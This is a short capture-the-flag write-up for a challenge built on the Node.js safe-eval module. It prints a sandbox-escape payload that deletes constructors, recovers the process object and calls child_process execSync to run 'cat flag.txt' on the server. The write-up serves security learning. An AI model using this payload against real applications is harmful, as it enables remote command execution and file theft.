Advent of CTF - Challenge 19

“Safe?”

Challenge

This challenge builds on the previous one. The elves upgraded the application with a module to make it safe again.

What you will learn:

  • Bypassing the safe-eval module

Solution

The introduction of this challenge is in ./../challenge-18/index.html. It starts the same, but you will notice that you can not call any function or standard Javascript objects. Entering any wrong data will give an error message, clearly showing the use of the safe-eval module.

identify-safe-eval.png
Figure 1: Identify safe-eval

Looking at the Github page for the project you might notice a currently open issue that states that the safe-eval can still be escaped.

github-20201220.png

The issue describes a payload that can be used to “exploit” the issue. In this case it will only return a process, but not do anything yet.

(
    delete(this.constructor.constructor),delete(this.constructor),
    this.constructor.constructor("return process")()
)

Building on it and with some NodeJS payload knowledge/research a new payload can be constructed.

(
    delete(this.constructor.constructor),
    delete(this.constructor), 
    this.constructor.constructor('return process')()
        .mainModule.require('child_process')
        .execSync('cat flag.txt').toString()
)

When you have your points, don’t forget to grab the badge!

badge.png

Go back to the homepage.